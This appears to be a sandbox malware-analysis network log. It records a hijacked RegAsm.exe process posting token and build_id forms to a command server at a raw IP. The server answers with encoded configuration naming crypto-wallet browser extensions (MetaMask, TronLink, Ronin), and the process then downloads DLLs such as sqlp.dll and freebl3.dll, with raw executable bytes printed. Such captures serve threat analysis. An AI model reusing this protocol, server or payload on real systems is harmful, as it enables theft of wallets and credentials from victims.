2024-09-21 12:48:51 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49753	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:52 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:52 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------FCAAEBFHJJDAAKFIECGDCont
2024-09-21 12:48:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:48:53 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49754	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:55 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 6797 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:55 UTC	6797	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------HDAAAAFIIJDBGDGCGDAKCont
2024-09-21 12:48:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:48:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49756	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:56 UTC	196	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:57 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:56 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:48:56 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 12:48:57 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-21 12:48:57 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49757	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:00 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:00 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------GHDBAFIIECBFHIEBKJJKCont
2024-09-21 12:49:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49758	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:01 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:01 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------KJJJKFIIIJJJECAAEHDBCont
2024-09-21 12:49:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49760	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:02 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:02 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CBFBGCGIJKJJKFIDBFCGCont
2024-09-21 12:49:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49761	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:03 UTC	199	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
